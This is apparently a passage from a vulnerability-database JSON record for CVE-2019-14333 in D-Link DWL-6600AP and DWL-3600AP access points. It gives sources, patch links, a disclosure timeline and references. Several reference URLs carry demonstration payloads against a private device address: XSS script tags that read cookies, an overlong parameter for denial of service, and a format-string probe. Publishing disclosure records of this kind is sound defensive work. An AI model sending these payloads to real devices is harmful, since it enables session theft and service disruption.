SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14333"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14333",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146269",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"id": "VAR-201908-0911",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
}
]
},
"last_update_date": "2024-11-23T21:52:00.729000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177599"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2019-08-01T13:15:14.023000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2024-11-21T04:26:31.713000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.